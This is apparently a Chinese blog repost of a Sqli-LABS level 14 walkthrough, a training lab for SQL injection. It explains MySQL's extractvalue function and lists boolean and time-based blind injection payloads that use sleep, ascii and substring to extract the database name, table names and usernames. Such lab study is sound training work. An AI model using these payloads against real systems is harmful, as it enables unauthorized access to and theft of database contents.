Sqli-LABS通关笔录-14-白红宇

Sqli-LABS通关笔录-14

阅读量：5733 次

发布时间：2019-06-18

本文共 853 字，大约阅读时间需要 2 分钟。

这一节让我学习到了

1.extractvalue函数（该函数用于对xml文件进行查询和修改，于此相关的还有一个叫“updatexml”函数）

语法：extractvalue(XML_document, XPath_string);

　　　　第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc

　　　　第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。

　　　　作用：从目标XML中返回包含所查询值的字符串

关于该函数的介绍使用：

Payload:

admin" and 1=1#

这题方法也是要用盲注。

------------------------------------------------------------------------------------------------

延时Payload:

猜数据库：admin" and if(ascii(substring(database(),1,1))=115,sleep(10),1)--+

猜表：admin" AND if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>1,sleep(20),1)#

猜列明：admin" AND if(ascii(substr((select username from security.users order by id limit 0,1),2,1))=117,sleep(10),1)#

------------------------------------------------------------------------------------------------

THE END

转载地址：http://ihlwx.baihongyu.com/

你可能感兴趣的文章

人像模式的灯光效果？iPhone 8开挂袭来

Spring Cloud版——电影售票系统<六>使用 Spring Cloud Config 统一管理微服务配置

查看>>

Java not support java EE1.3

查看>>

iptables规则备份及恢复、firewalld九个zone,service的操作

深圳联通特邀湖北籍企业参观公司总部大楼举行

查看>>

告警系统主脚本、告警系统配置文件、告警系统监控项目

查看>>

Python 和 PyCharm 在 windows10 环境的安装和设置

查看>>

C语言入门基础之数组——数学和编程的完美结合（图）

第三课 Linux目录及文件管理、用户组管理及bash重定向

查看>>